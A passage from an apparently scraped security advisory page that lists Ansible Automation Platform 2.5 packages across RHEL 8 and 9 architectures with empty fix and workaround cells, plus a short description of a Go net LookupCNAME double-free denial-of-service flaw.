Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch | — |
Workaround
|
A flaw was found in the `net` package of Go (golang), specifically when using the `LookupCNAME` function with the `cgo` DNS resolver. A remote attacker could exploit this by providing a very long Canonical Name (CNAME) response. This can trigger a double-free of C memory, leading to a crash and a Denial of Service (DoS) for the affected application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x | — |
Vendor Fix
fix
Workaround
|
|
